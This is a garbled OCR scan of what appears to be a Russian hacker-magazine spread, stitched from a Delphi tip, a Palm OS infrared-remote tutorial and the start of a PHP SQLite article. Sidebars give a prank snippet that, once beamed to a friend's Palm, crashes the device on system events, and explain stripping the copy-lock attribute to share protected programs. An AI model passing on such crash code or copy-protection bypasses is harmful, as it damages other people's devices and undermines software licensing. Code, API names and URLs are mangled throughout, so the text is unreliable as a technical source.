А ДОСТУП К ФЛЙПЛМ 

Самое сложное при создании необходимого 
файла - технология доступа. Я всегда реко- 
мендую использовать объект ТРіІеВІгеат, по- 
тому что он удобен, универсален и легко 
адаптируется для будущего использования, 
например для перевода на .МЕТ. Но в дан- 
ном случае этот вариант не подходит, пото- 
му что нужно будет подключить модуль 
СІаззез и запускной файл увеличится с 23 
кило до 90, а это нерационально. 

В качестве решения стоило было бы выб- 
рать ѴѴіпсІоѵѵз АРІ функции типа СгеаІеРіІе 
или более старых функций Тореп, но это 
привяжет нас к старой платформе и могут 
возникнуть проблемы с переходом на .МЕТ. 

Эеірііі предоставляет хорошее решение - 
встроенные функции, не требующие подклю- 
чения модулей и не увеличивающие размер 
исполняемого файла. 



Л итого 

Ріа рисунке 4 показано окно программы Тбе 
ВаТ! после добавления файла манифеста 
(патчинга сегодняшней прогой). Эта версия 
не умела отображаться в стиле ХР и кнопки, 
элементы управления были квадратными до 
моего вмешательства. 

Если тебе нужна утилита маленького раз- 
мера и не хочется заморачиваться с ѴѴіпсІоѵѵз 
АРІ, то выбирай КОЫ-МСК. Это отличный 
способ оптимизировать размер программы 
без потери скорости разработки. Лично я 
с этой библиотекой познакомился недавно и 
теперь все исполняемые файлы, которые 
должны будут пересылаться через инет, 
пишу только с ее помощью. 
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Хорошие вещи обычно умещаются на падони поодиночке. Будь то спепое ябпоко, ароматный апельсин или женская грудь - все 
аппетитно и приятно на ощупь. Заполучив один из этих предметов тем или иным образом в руки, сразу выпускать их не хочется. 
Напротив, даже если в то же время возникнет желание послушать музыку или посмотреть телевизор, очень жаль хоть и на время 
расставаться с драгоценным содержимым падони. То же самое относится и к компьютерам - представителям семейства, которое окрестили 
наладонниками. 



кодинг под роім - попы д/9 для тепевизорп 



если аппетитный плод или 
прекрасная часть женского те- 
ла не позволят тебе переклю- 
чать каналы и менять гром- 
кость, то с помощью КПК Раіт 
сделать это несложно. 

В этой статье, вслед за 
публикацией моего коллеги 
о программировании Роскеі РС в предыду- 
щем номере, мы рассмотрим другую разно- 
видность наших меньших братьев. А именно 
чуть ли не до сих пор самое популярное се- 
мейство КПК в мире - Раіт. 

Кстати, даже если сам ты и не имеешь та- 
кого зверя в своей коллекции, все равно эта 
статья не пройдет для тебя даром - кодить не 
обязательно для себя, да и среди твоих знако- 
мых наверняка есть палм-юзеры. Для них у 
нас всегда найдется пара полезных трюков, 
а пример работы с БД из этой статьи можно 
использовать в любых корыстных целях ;). 

Для начала вооружимся необходимым 
инструментарием. Понадобятся нам всего 
две вещи: МеІгоѴѴегкз СосІеѴѴаггіог Тог Раіт и 
Раіт йезкіор, причем последний идет на си- 
дюке в комплекте к наладонному другу. 

Как и под многие другие виды КПК, кодить 
под Палм можно целиком на компе. Как пра- 
вило, каждый раз загружать программу на 



устройство необходимости нет. НоІЗупс зани- 
мает время, да и если смотреть одновремен- 
но в монитор и на КПК, окосеть можно намно- 
го быстрее обычного. Для отладки существует 
Раіт Етиіаіог - прога из пакета МеігоѴѴегкз. 
При ее запуске открывается похожее на Палм 
окошко, а в ЮЕ можно пошагово бегать по 
строкам, смотреть переменные и делать все 
то, что позволяет делать бытовой дебагер при 
разработке программ для РС. 

Готовую прогу можно слить на Палм пос- 
редством Оиіск ІпзІаІІ - программы, входя- 
щей в комплект Раіт Оезкіор. В Винде ты 
можешь дабл-кликнуть на .РВС (палмовый 
аналог .ЕХЕ), и окошко инсталла откроется 
само. А минуя клики вручную, можно просто 
скопировать выполняемый файл в каталог 
\Ргодгат РіІез\РаІт\<имя юзера>\ІпзІаІІ. 

При ближайшем сеансе синхронизации с пи- 
сюком (в палмовой терминологии - НоІЗупс) 
бинарник будет установлен на девайс. 

.і программ рпмтѵ 

На сидюке ты найдешь иллюстрацию в виде 
проекта РаІтТѴ, который, используя описан- 
ные выше методы, а также некоторое знание 
процессора Моіогоіа ОгадопЬаІІ, сделает из 
твоего Палма пульт д/у. Знания процессора 
понадобились тут вот по какой причине. 




Стандартный Раіт АРІ предоставляет весьма 
ограниченные возможности для работы с 
инфракрасным портом. Все, что можно сде- 
лать стандартными средствами, банально и 
скучно. Это Ьеатіпд (передача программ с 
одного Палма на другой) и ІЮА. Запись и 
воспроизведение сигнала можно сделать, 
только обратившись напрямую к чипу ІІАРГГ 

С самой программой работать просто. Для 
начала нужно раздобыть настоящий ПДУ от 
интересующего девайса (скажем, от кондици- 
онера, что стоит в твоем любимом баре). Пос- 
ле этого, давя на кнопку «ВесогсІ», записать 
команды и дать им названия. Дело в шляпе. 
Придя в бар, выбираешь нужный код и жмешь 
«РІау», пока температура не понизится до по- 
лярной и не заведутся белые медведи :). 

Хочу сразу предупредить счастливых об- 
ладателей последней линейки Раіт (модели 
2іге и Типдзіеп), что РаІтТѴ у них не зарабо- 
тает. Причина проста - во всех новых моде- 
лях стоят камни Техаз Іпзігитепіз ОМАРЗЮ 
(АРМ). А так как программа привязана не- 
посредственно к архитектуре драконьего яй- 
ца (ОгадопЬаІІ) - опаньки. Проц-то другой. 
Пойдет она только на моделях т505, тІЗО, 
ті 25, т105 и им подобным. 

И хотя авторы ОтпіРетоіе - наворочен- 
ного коммерческого решения, превращаю- 
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щего Палм в ПДУ для всего на свете, - смог- 
ли разобраться с новой архитектурой, я ре- 
шил, что в качестве примера будет вполне 
достаточно старой доброй Моторолы. Ну а 
если ты, дружок, заимев основные навыки, 
решишь разобраться в потрохах нового кам- 
ня ОМАРЗЮ и реализуешь запись и воспро- 
изведение сигнала на последних моделях, в 
старости я скажу, что жизнь моя прожита не 
зря. Ты уж постарайся. 

А ПРИСШПЕМ 

Первый шаг к бессмертию - запуск СѴѴ, Рііе, 
№ѵѵ, Раіт ОЗ АррІісаТіоп Зіайопегу. Для нас 
сразу будет сгенерено приложение с дефо- 
лтным названием ЗТагТег, содержащее одну 
форму, менюшку и диалог АЬоиТ Заимев оп- 
ределенные навыки, мы без труда превра- 
тим его в самый настоящий ПДУ. 

Шаги по созданию программы будут сле- 
дующими: 

О. Дизайн интерфейса. Нарисуем морду. 
Состоять она будет из списка команд и трех 
кнопок под ними. Для записи инфракрасного 
кода с других ПДУ, его воспроизведения и 
удаления соответственно. 

О. Кодинг работы с базой данных. Соз- 
дание и открытие БД, добавление записи с 
ИК-сигналом, удаление записи. 

Ѳ. Кодинг доступа к интерфейсу И К Пал- 
ма. Нормального АРІ для доступа к ИК-порту 
нет, поэтому сделать это предстоит немного 
по-уродски - прямым обращением к ІІАНТ, 
встроенному в процессор. Совместимость 
получается соответствующей. 

А ВНЕШНИЙ ВИД 

Интерфейс пользователя в Палм-приложени- 
ях состоит из форм. Форма - это то, что в 
один момент времени может (частично) за- 
полнять экран, что-то вроде диалога или 
окошка. Даже если мы видим две перекры- 
вающиеся формы, активной на данный мо- 



мент является только одна - та, которая впе- 
реди. Палму неизвестны ни многозадач- 
ность, ни многооконность. 

На форме могут располагаться объекты - 
элементы, обеспечивающие ввод данных. 
Пример формы - настройки, список команд 
ПДУ с возможностью удаления и добавления 
и прочее. 

Формы живут в ресурсах. В стартовый 
проект обычно уже включен файл 
ЗШег.гзгс, который находится в папке 
Везоигсез проекта. Дабл-клик на нем запус- 
тит Сопзігисіог, в котором можно заниматься 
художественным оформлением. Конструиро- 
вание интерфейса состоит из следующих 
шагов: 

О. Создание формы. В окошке со спис- 
ком ресурсов кликаем на подзаголовке 
Рогтз и нажимаем СігІ-К. Появится элемент 
«ипМІесІ», который следует переименовать в 
название формы: одиночный клик на «ипіі- 
Неб», и вводим название. 

О. Определение элементов формы. 
Дабл-клик на названии открывает окошко 
редактирования свежесозданной формы. 
Здесь можно изменять основные параметры 
формы, а также добавлять элементы. Пос- 
леднее осуществляется посредством пере- 
таскивания объектов из окошка «Саіаіод». 
Одиночный клик на объекте открывает ргор- 
еііу оного. Для каждого интерфейсного эле- 
мента есть свои параметры. Их названия го- 
ворят сами за себя. 

Еще элементам хорошо давать названия. 
Автоматом Сопзігисіог называет их 
11ппатесКкод>, и если оставлять их такими, 
недолго и заблудиться в трех кнопках и паре 
полей ввода. Чтобы этого не случилось, кли- 
каем на значении «ОЬіесІ ісІепМіег» и пишем 
название. 

Ѳ. Выход и сохранение. После того как 
все элементы интерфейса программы опре- 
делены, Сопзігисіог можно закрыть. Если 



ПРОСТЕЙШЕЕ ЗППРДПО ДПЯ ПППИ-ЮЗЕРП 

Р аіпл 05 - довольно нежная операционка. Западло другу сде- 
лать очень просто. Достаточно бимнуть ему программку, со- 
держащую одну только функцию РіІоШаіп(). В нее можно вста- 
вить код, который будет валить систему. Скажем, такой: 



сііаг *р = 0; 
$ігРгіпіР(р, "%$"); 



Дело в том, что РіІоіМаіп() программы, установленной на Пал- 
ме, вызывается не только при непосредственном ее запуске. 
Каждая программа фактически запускается при многих событи- 
ях: загрузке системы, поиске (система спрашивает каждую 
программу, есть ли в ней запись с нужно подстрокой во время 
поиска), при НоіЗупс, изменении времени и даты в системе и 
т.п. Каждый раз вызывается РіІоШаіпО, который получает код 
события. Сделано это для того, чтобы программы при необхо- 
димости оповещались о происходящем в системе. 

Большого вреда такое западло не принесет. Недаром придуман 
НсЯЗупс, при котором все содержимое пилота сливается на 
комп. Поэтому пострадавший товарищ просто сотрет содержи- 
мое своего наладонника с помощью ІіагсІ гезеі:, после чего про- 
ведет синхронизацию содержимого Палма с бекапом на диске 
своего компа. 




что-то в файле ресурсов было изменено, за- 
головок с определениями констант интер- 
фейса будет перезаписан. Вообще, хидер 
ресурсов (по умолчанию он называется 
ЗІагІегПзс.И, в проекте он был переименован 
в раітіѵгзс.іт) служит для связки интерфей- 
са и кода посредством неких Ю. Заглянув в 
него, мы заметим такие определения: 



Ассоциация элементов интерфейса с Ш-ами 
в раІпіѵ_г$с.іі 



II Ре$оигсе: ІРКМ 1000 
Шіпе МаіпРогт 
1000 

Шіпе МаіпКесогОВиііоп 1002 

Шіпе МаіпРІауВиііоп 1003 

Все это участвует в вызовах АРІ, отвечаю- 
щих за интерфейс пользователя. Скажем, 
открываем модальную форму мы так: 



Открытие формы 



РогшРіг РгшР: 

РгшР = РгтІпііРогт(АЬоиіРогт); 

РгтОоОіаІод(РгтР); 

РгтОеІеіеРогт(РгтР); 

Это пример взят из автоматически сгене- 
рированного кода простейшего проекта. 
АЬоіЛЕогт - константа из ЗІаіІегВзс.Іт, свя- 
занная с формой АЬоиТ из ресурсов. Обра- 
ботчик событий в этом случае у нас дефолт- 
ный, поэтому обработать какие-то специфи- 
ческие вещи мы не сможем. При наличии 
полей ввода, чекбоксов или других элемен- 
тов, требующих дополнительный обработки, 
придется писать хэндлер. Кроме этого, саму 
форму будем вызывать по-другому. 

Разберем простейший проект Зіаііег. 
Форма МаіпРогт в нем обрабатывается по 
всем правилам событийной модели Палма. 

В самом начале она активируется с по- 
мощью РгтСо1оРогт(). 

РгтбоіоРогт(МаіпРогт); 

Событие туг же попадает в АррНапсІІеЕѵепІ(), 
который загружает форму и назначает ей об- 
работчик: 



А РаІтТѴ с исход- 
никами найдешь на 
компакте. Там же - 
дока по процу 
МС68Ѵ2328 и нес- 
колько полезных 
текстов в РйР. До- 
ков довольно много, 
поэтому не поле- 
нись разобраться. 

л Кроме инфрак- 
расного порта, 
Палм умеет рабо- 
тать с серийным 
портом и Ыиеіооііі 
(в последних моде- 
лях). А еще у него 
есть поддержка 
ТСР/ІР. 

а Этой статьей мы 
начинаем и закан- 
чиваем повество- 
вание о кодинге 
под Раіт ОЗ, поэ- 
тому она и вышла 
столь большой. Ес- 
ли ты хочешь еще - 
спамь предложени- 
ями на аіехап- 
бег@геаІ.хакер.ш. 



Обработчик событий приложения АррНапбІеЕѵепЮ 



і! (еѵепіР->еТуре == 1гтІ.оа(1Еѵепі) 
{ 

//Загрузить форму из ресурса. 
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ЕогтІсІ = еѵепМаіа.ЕгтЕоаШтШ; 

ІгтР = РгтІпііРогт(ТогтІіІ); 

Ргт$еіАсііѵеРогт(РгтР); 

//Установить обработчик событий для формы. Обработчик 
формы, активной 

//в данный момент, вызывается из ЕгтНаікІІеЕѵепі каждый 
раз при получении 
//события, 
зѵѵіісіі (ТогтІсІ) 

{ 

са$е МаіпРогт: 

Ргт$еіЕѵепіНапбІег(РгтР, МаіпРогтНапбІеЕѵепі); 

Ьгеак; 

А если заглянуть в сам обработчик, то там 
уже найдется вся остальная реакция формы 
на события. Тот же тепиЕѵепІ, по которому 
открывается менюшка. В общем, читай код. 

Собственно, так ты будешь поступать со 
всякой более-менее сложной формой. Для 
открытия будешь вызывать РгтСо1оРогт(), 
после чего в АррНапсІІеЕѵеп{() добавишь до- 
полнительный сазе с Ю-ом твоей формы и с 
помощью РгтЗеІЕѵепШапсІІег() назначишь 
свой обработчик. 

Альтернативой РгтСоіоРогт() является 
связка РгтРорирРогтО и РгтВеШгпТоРогт(), 
с помощью которых возможно наложение 
одной формы на другую. 

А ОПЕРТЫ 

Для небольших информационных окошек 
стоит использовать алерты. В приложении 
можно определить один алерт на все случаи 
жизни, назначив ему текстом такую строку: 
« Л Г2 Л 3». Сделаем мы это в конструкторе, 
поле «Меззаде». Цифры после крышки ( Л ) 
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НЕЙТРППИЗУЕМ защиту 

Т акже в Палме есть крутая защита. Она заключается в том, что 
можно бимать не все программы. Те, возле которых нарисо- 
ван замок (амбарный, хе-хе), 
посылать через ІП нельзя. А 
что делать? Поделиться -то хо- 
чется. 

Как амбарный замок легко 
сбивается ломиком, так и ат- 
рибут І_оскесІ можно снять, а 
то и просто положить на него с 
прибором. В качестве лома, 
против которого нет приема, 
выступит программа Рііег. Она 
вообще позволяет узнать 
многое о содержимом Палма. 

Так, например, с ее помощью 
можно смотреть и модифици- 
ровать БД от разных прог- 
рамм, снимать и ставить атри- 
буты и т.п. Если ты решил поз- 
накомиться с Палмом побли- 
же, РіІе2 тебе наверняка при- 
годится. 

V 




соответствуют параметрам вызова функции 
РгтСизіотАІеі1(). Всего их как раз три. 

Теперь чтобы вывести любое информаци- 
онное сообщение, мы впредь будем писать 
такой код: 

РгтСийотАІегКРаІтТѴАІегі "ТИіз ", "аіегі ", "гиіез!"); 

Все остальное очень доходчиво описано в 
доке, которую ты обязательно найдешь в 
\Ргодгат РіІез\Меігоѵѵегк5\СосІеѴѴаггіог\СѴѴ 
Рог Раіт 03 Зирроі1\0оситепІайоп\РаІт 03 
5.0 Оосз\. Самым ценным, пожалуй, будет 
файлик Раіт 03 ВеРегепсе.рсІТ 

А БПЗЫ БПННЫХ 

Даже если необходимость в сохранении дан- 
ных заключается только в записи неких не- 
больших кодов и их названий, нам все равно 
понадобится место, где их можно хранить. 
Главным образом, чтобы помимо Палма не 
пришлось таскать с собой картотеку с эта- 
жеркой и библиотекаршей :). 

Спешу расстроить привыкших к Му50І_ или 
Огасіе любителей реляционных баз. 50І_ в Пал- 
ме и не пахнет, даже если обнюхаешь весь эк- 
ран заодно со слотом для карточки расшире- 
ния. Вместо этого нам предлагают набор функ- 
ций для довольно низкоуровневого доступа к 
записям, определяющимся в коде на С как 
зігисі. Еще один способ - писать записи после- 
довательно с помощью нескольких вызовов 
ОтѴѴгііе(), просчитывая смещения каждого поля 
вручную. Вычитывать их содержимое придется 
путем парсинга сііаг-указателя на запись. Вооб- 
ще, многое приходится делать руками. Начиная 
с проверки на существование базы, поиска, и 
заканчивая блокированием памяти подданные. 

При работе с памятью в Раіт 03 очень ре- 
комендуется вспомнить начало 90-ых годов и 
их символ - операционку ДОС. Почему? Глав- 
ным образом потому, что ответственность за 
все действия с памятью ложится на разработ- 
чика. Никаких дворников (дагЬаде соііесіог), 
5Й::аіЛо_р{г<>, ни даже аІІоса(). И если ты, 
дружок, изнасилуешь операционку, загребая 



память своими жадными потными ручонками, 
то тебе самому все это и придется расхлебы- 
вать. Вкратце ситуация такова: 

О. Память выделяется посредством 
МетНапсІІеІ\Іеѵѵ(), который возвращает хэндл 
блока памяти. Не нужно пугать хэндл и 
собственно указатель. Чтобы его добыть, нуж- 
но вызвать еще одну стандартную функцию. 

Ѳ. Указатель на область памяти можно 
получить с помощью МетНапсІІеІ_оск(). Вы- 
зывать эту функцию нужно всегда перед об- 
ращением к какому-либо блоку памяти. 

®. После того как сеанс работы с блоком 
памяти закончен, следует вызывать 
МетНапсІІеІІпІоск(). 

О. Наконец, когда кусок памяти станет 
совсем ненужным, зовем МетНапсІІеРгее(). 
Вуаля. 

Сохранение любых данных в Палме пре- 
дусматривает использование АРІ для работы 
с БД. Узнаем врага в лицо. 

О. Открытие существующей БД. 



Открываем БД 



$іаііс ОтОрепРеТ сІЬІі = 0; 

(ІЫі = ОтОрепОаіаЬа$еВуТуреСгеаіог(аррОВТуре, 
аррЕіІеСгеаіог, (ІтМоМеасМе); 

Первые два параметра идентифицируют 
базу. Константа аррРіІеСгеаТог обычно авто- 
матом определяется в начале генерируемого 
исходника. Что касается типа, то его можно 
придумать самому. Желательно, чтобы он 
как-то характеризовал базу. Разные типы с 
одинаковым криэйтором будут обозначать 
разные базы, принадлежащие одному и тому 
же приложению. 

О. Создание БД. Если попытка открытия 
БД не удалась, рекомендую попробовать ее 
создать. Это избавит пользователя от необхо- 
димости заливать помимо бинарника еще и ба- 
зу данных в свой Палм. Впрочем, большинство 
умных программ так и делают. Продолжаем: 










ГОВОРИТ И ПОКПЗЫВПЕТ РРІ.М 



сайты ПО ТЕМЕ 



а ѵѵѵѵѵѵ.сі^огит.ги/ргодгаттіпд/сІіде5ѴраІт_о5 - операци- 
онная система Раіпл 05 для программиста 

л ѵтѵтѵѵ.теІгоѵѵегкз.сот/МѴѴ/ОеѵеІор/СосІеѴѴаггіог - офици- 
альный сайт среды разработки СобеѴѴаггіог. 

а рсГ азеси гііу . сИаі . ги/та і п . Ніпп I - взлом программ на РаІтРіІоІ: 
для чайников 

а ЛірріпЬіІз.сот/Іѵѵікі/Ьіп/ѵіеѵѵ/РАО/ѴѴеЫНоте - Раіт Эеѵе- 
Іортепі РАО (англ.) 

а шшш.саІзоЙ.со.іпДесГісепІег/риІзезІіаріпд.ГііппІ - теория 
по работе с ИК-портом Палма для эмуляции ПДУ. 

^ѵѵѵѵѵѵ.позіеер.пеі - отсюда берем РіІе2 

^ѵѵѵѵѵѵ.расіЛспеоІек.сопп - программа ОтпіРетоІе, самое из- 
вестное решение для ПДУ под Палм 

^ѵѵѵѵѵ^ппт.ги/раІтг.рПр - раздел раіплг на попате.ги 

а ѵ\ллл/ѵ.аЬс92.ги/агІісІез/раІт/ІіпихсІеѵ - разработка прог- 
рамм для Раіпл 05 в І_іпих 

а дгоирз.уаИоо.сот/дгоир/раІт-сІеѵ-^огит - форум разра- 
ботчиков наѴаНоо! Огоирз 

а ѵ\АлллА.раІторепзоигсе.сот - ТІіе Раіпл 05 Ореп 5оигсе РоііаІ 

4 ѵѵѵѵѵѵ. раітдеаг.сот - 5оигсе Тог Раіт ІіапсІІіеІсІ зоЙѵѵаге, пеѵѵз 
& геѵіеѵѵз 

V 



Проверка на наличие, открытие и создание БД 



сІЫі = ОтОрепОаіаЬа$еВуТуреСгеаіог(аррОВТуре, 
аррРіІеСгеаТог, сІтМосІеРеасІѴѴгіТе); 

іктыі) 

і!(0тСгеаіе0аіаі)а$е(0, "раітіѵ", аррРіІеСгеаіог, аррЛВТуре, 
ТаІ$е) == еггИопе) 

сІЫі = ОтОрепОаіаЬа$еВуТуреСгеаІог(аррОВТуре, 
аррРіІеСгеаіог, сІтМосІеКеасІМе); 

®. Добавление записи. Здесь тоже все 
не так просто. Сначала надо задать пози- 
цию. Потом получить ссылку на вновь добав- 
ленную запись, после чего залочить ее и за- 
писать данные. Всем этим занимаются спе- 
циальные функции. Смотри: 



Создаем запись в БД 



Шпііб гп = (ІтМахВесогсІІпсІех: 

МетНапЫе Іі = ОтЫеѵѵРесогсКсІЬРі, &гп, 
$ігІеп(іііІе) + 1 + МетРіг$і2е(ігОаіа)): 

Ѣ){ 

р = (СПаг *) МетНапЫеІжк(Іі); 

ОтМе(р, оіі$еі, ііііе, 8ігІ.еп(іііІе) + 1); 

РтѴѴгіІеір, оіі$еі + $ІгІ.еп(іііІе) + 1, ігРаіа, МетРіг$І 2 е(ігОаіа)); 
МетНапсІІеІІпІоск(Рі); 

ОтРеІеа$еРесогсІ((ІЫі, гп, ігие); 

} 

В нашей программе каждая запись будет 
состоять из двух частей: названия команды, 
которое будет отображаться в списке, и са- 
мого ИК-кода команды. Раз уж первая часть 
- строка, то разделителем будет служить ну- 
левой символ. 

©. Перебор записей в базе. Делается 
тривиально. Организуется простой цикл Тог 
от нуля до количества записей в базе, кото- 
рое можно высчитать с помощью вызова 
ОтМитВесогсІ5(). В этом цикле при помощи 
ОтОиегуВесогс1() получаем ссылку на запись 



и читаем ее. Еще мы тут же будем формиро- 
вать список элементов для элемента интер- 
фейса ШзІ (массив ііетз; количество эле- 
ментов в пйетз). 



Перебираем записи в базе и заполняем список 



Гог(і = 0; і < ОтМитРесог(І$((ІЫі): і++) { 

Іі = ОтОиегуКесог(1((1Ыі, і); 
іі(ІІі) сопііпие; 

іі((р = (сііаг *) МетНапсМоск(Іі))){ 

Іір = МетНап(ІІе№ѵѵ($ігІеп(р) + 1); 
ііет$[пііет$] = (сііаг *) МетНап(ІІеІ.оск(Іір); 
$ігСору(ііет$[пііет$], р); 

МетНапсИеІІпІоск(Іі); 

пііет$ ++ ; 

} 

} 

©. Удаление записей. Для этого сущест- 
вует две функции: ОгтЮеІеІеВесогсІО и 
ОтВетоѵеВесогсІ(), разницу между которы- 
ми следует знать. В то время как первая 
только помечает записи для удаления, вто- 
рая их стирает решительно и насовсем. По- 
метка для удаления может быть впослед- 
ствии снята. Однако как только произойдет 
следующий НоІЗупс с десктопом на компе, 
такая запись тоже будет снесена. 

Обе функции принимают два параметра. 
Первый - ОтОрепВеТ базы, второй - индекс- 
ный номер записи. Тот самый, по которому 
ее читает ОтОиегуВесогсІ(). Позиция в спис- 
ке и порядковый номер записи в базе в на- 
шей программе совпадают. 



Удаляем запись из базы 



іі(І$іРо$ < 1$16еШитЬег(Шет$(1$1Р)) 
ЛтКетоѵеКесоггКгІЫі, І$іРо$); 



А кпкзпкппя... 

КОВЫРЯЛСЯ ПРОЦЕССОР 

Чтобы начать близкий к железу кодинг, для 
начала раздобудь доку по нужному железу. 
Точная маркировка нашего процессора - 
МС68Ѵ2328. Идем на сайт со звучным и да- 
ющим весьма точную характеристику предс- 
тоящей деятельности названием 
еЬиз.тоІогоІа.сот. Теперь вводим модель в 
поле кеуѵѵогсі. Качаем РЭР. 

Интересующая нас часть называется 
ІІАВТ. Раздел «Ргодгаттег'з Метогу Мар» 
содержит табличку с адресами всех уст- 
ройств. Оттуда мы получаем адрес 
ОхРРРРРЭОО и в исходнике заводим на него 
прямую ссылку. По смещениям регистров 
для задания скорости (ЬаисІ гаіе), передатчи- 
ка, приемника и прочих (все указаны в том 
же разделе доки) мы будем изменять нуж- 
ные нам параметры. 

В начале каждого сеанса работы с портом 
метод ігтоІогоІа::орепзегіаІ() открывает порт, 
устанавливает нужные параметры и сохраня- 
ет прежние значения регистров порта с тем, 
чтобы при закрытии они могли быть восста- 
новлены. Метод сІозезегіаЦ) делает в точнос- 
ти обратное. 

Для записи и воспроизведения ИК-сигна- 
ла мы будем использовать регистры ІІАВТ и 
(ЗРЮ Роіі Е, так как документация утвержда- 
ет, что именно он связан с ІІАВТ. Алгоритм 
такой. Сначала в порт пишется значение 
0x0855. 08 - игнорируем сигнал СТ81 для 
немедленной отсылки сигнала. Все это мы 
узнали из разделов 2.9 и 10.4.6.3 докумен- 
тации. Биты с 0 по 7 определяют сигнал для 
отправки. В бинарном виде это будет 
1010101 - в точности как пакеты пульта д/у. 
Узнать этот паттерн нам помогла дока по 
риізе зМаріпд от индусов. 

Цикл «ѵѵЬіІе((*иагШазеЪ( & 0x8000) == 0)» 
ожидает установки бита РІРО-етрІу в 1 . 

Как только бит установится, считаем, что 
символ ушел. Пока бит не установлен, вы- 
ходит нужный нам тайм аут - задержка 
между частями ИК-сигнала. Проверка 
«*РЕОАТА & 0x10» (четвертый бит) на Рогі Е 
позволяет узнать, получил ли ИК-порт пер- 
вый сигнал. Получил - начинаем запись. До 
победного конца в том же цикле продолжа- 
ем писать байты и проверять нужный бит. 
Сигнал складываем в буфер в виде после- 
довательности нулей и единиц. Для выдер- 
живания пауз между составными частями 
сигнала используется ІІАВТ, которому для 
посылки сигнала требуется время. Которое, 
в свою очередь, зависит от выставленного 
ЬаисІ гаіе. При отсутствии в Раіт 08 более- 
менее точного таймера иногда приходится 
и не так извращаться. 

Немного проще выглядит воспроизве- 
дение, которым занимается метод ігто- 
ІогоІа::рІау(). Перед посылкой каждой из 
частей сигнала записываем 0x55 в ІІАВТ, 
регистр ТХ. Затем смотрим, что у нас в 
буфере. Если сигнал ненулевой, то через 
регистр 8ЕІ_ разрешаем вывод на ИК- 
порт. Если ноль - запрещаем. В этом слу- 
чае сигнал не пойдет наружу, но нужная 
пауза все же будет выдержана. Пустой 
цикл ѵѵЬіІе(), что крутится каждый раз с 
проверкой бита 15 регистра ТХ (готов- 
ность), - тот самый тайм аут, который 
нужно выдержать. ЗС 








И уже много писан о различных схемах хранения данных. Мы хорошо разобрались с работой классических зці-серверов, пощупали в 
работе ЮПР и текстовые базы. Я уже было хотел завершить этот увлекательный рассказ тестированием производительности всех 
предложенных схем, как внезапно вспомнил об еще одной блестящей альтернативе громоздким базам данных. Ее функциональность 
и производительность столь хороши, что я просто обязан рассказать тебе о ней. 




НОВОЯ ЯПЫЕРНРТИВД МѴ8Щ 




А о оно надо? 

8 дІ_йе - это встраиваемая биб- 
лиотека, расширение для 
РНР, в котором реализована 
добрая половина стандарта 
30192. ЗцШе предоставляет 
качественный интерфейс к 
нерелятивистской базе дан- 
ных; вся информация, храни- 
мая в такой базе, находится в одном-един- 
ственном файле, а работа с этими сведения- 
ми осуществляется при помощи классного 
интерфейса, поддерживающего стандартный 
синтаксис 301-. При этом, как и следовало 
ожидать, существенных различий с точки 
зрения ріір-программиста между такой ба- 
зой и туЗС)І_ нет - при переходе на новую 
технологию не понадобится менять ни одно- 
го запроса! Скептики могут возразить: «Пе- 
реход на новую технологию? Да на фиг надо, 
эта Іііе-версия, наверное, лагает не по-детс- 
ки, тормозит и глючит». Это не так, смею те- 
бя заверить. В ряде случаев ЗцІЛе даже вы- 
игрывает в производительности у тяжело- 
весных серверов БД, и в этом, скажу тебе по 
секрету, нет ничего удивительного. Впрочем, 
не буду забегать вперед. 

Поскольку как таковая база данных ЗцШе 
- это обычный файл, отпадает всякая необ- 



ходимость в хитроумных средствах дополни- 
тельного администрирования для разграни- 
чения прав доступа, не нужно городить це- 
лый огород с защитой пользовательских 
данных, квотирования объема хранимой ин- 
формации и т.д. Все это легко и очень гибко 
реализуется самой файловой системой - 
достаточно лишь выставить требуемые права 
для файла с БД, и все проблемы отпадают 
сами собой. Также не могу не отметить, что 
использование этого интерфейса повышает 
и общую безопасность системы - ведь эта 
СУБД не является никаким сетевым демоном 
и возможность удаленного взлома через 
средства БД отсутствует как таковая. Другое 
большое преимущество для пользователей 
заключается в том, что они могут легко соз- 
дать столько баз данных, сколько им потре- 
буется, в то время как при использовании 
ту8С)І_ их число обычно ограничено, более 
того, по ряду причин по-другому на нор- 
мальных хостингах и быть не может :). А 
поскольку база данных - это всего-навсего 
единственный файл, становится очень легко 
бэкапить информацию и вообще полностью 
ее контролировать. Думаю, совершенно по- 
нятно, что благодаря организации этой БД 
отпала сама необходимость в установлении 
сетевых соединений «клиент-сервер», прису- 






щих тяжеловесным аналогам. Для работы 
ЗцІЛе требуется заведомо меньший объем 
памяти, в то же время этот интерфейс мо- 
жет обеспечивать работу с базами до двух 
терабайт. Согласись, впечатляет. 

Весь этот интерфейс - это несколько но- 
вых РНР-функций, встраиваемых в уже су- 
ществующий интерпретатор. Это не какое-то 
внешнее ПО, и установка такого расширения 
не займет много времени, даже более того - 
в ряде случаев вообще не займет :). 

А ДОЕШЬ установку! 

Поскольку давно уже вышел официальный 
релиз РНР 5.0, я настоятельно рекомендую 
тебе установить его, а заодно расскажу, как 
использовать ЗцШе совместно с этой верси- 
ей языка. В РНР 5.0 подцепить ЗцШе проще 
простого: достаточно при сборке бинарника 
указать параметр -ѵѵіШ-зцІйе конфигурацион- 
ному скрипту. Также может оказаться удоб- 
ным собрать ЗцБйе в отдельную бинарную 
библиотеку, что позволит открывать базу 
данных и управлять ею без использования 
РНР. Это на самом деле офигительная воз- 
можность, очень полезная для отладки и 
тестирования кода запросов. Через некото- 
рое время, когда появятся новые версии 
ЗдІЛе, ты без проблем сможешь собрать но- 
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ЗОНТЕ: ЛЕГЧЕ НЕ БЫВОЕТ! 



вый вариант СУБД и так же легко подцепить 
к РНР. При этом, само собой, не потребует- 
ся пересобирать сам интерпретатор РНР. Ну 
что, потекли слюнки? :) 

Чтобы собрать расширение ЗцШе в каче- 
стве внешней библиотеки, нужно просто ука- 
зать флаг -ѵѵШі-здІіІе=/раШАо/ІіЬ/. 

Не могу не отметить, что ЗцШе проходит 
целую серию тестов, наглядно показывающих 
функциональность нового продукта. Тестиро- 
вание проходит каждая отдельная функция. 
Все это позволит тебе быстрее понять прин- 
цип их работы и послужит хорошим источни- 
ком готовых примеров по работе с ЗцІіТе. 

Л НОШ ТО ІІ8ЕІТ 

При работе с ЗцІЛе в РНР возможны два 
принципиально различных подхода. Первый 
подразумевает использование объектно-ори- 
ентированного интерфейса, когда указатель 
на открытую базу данных является объектом 
с несколькими стандартными методами. Вто- 
рой способ - классический, процедурный. 
Используются несколько предопределенных 
стандартных функций, которые по своей ра- 
боте идентичны функциям работы с любым 
зці-сервером. Более того, переход к ЗцШе 
потребует от программиста только лишь из- 
менения префикса в названиях используемых 
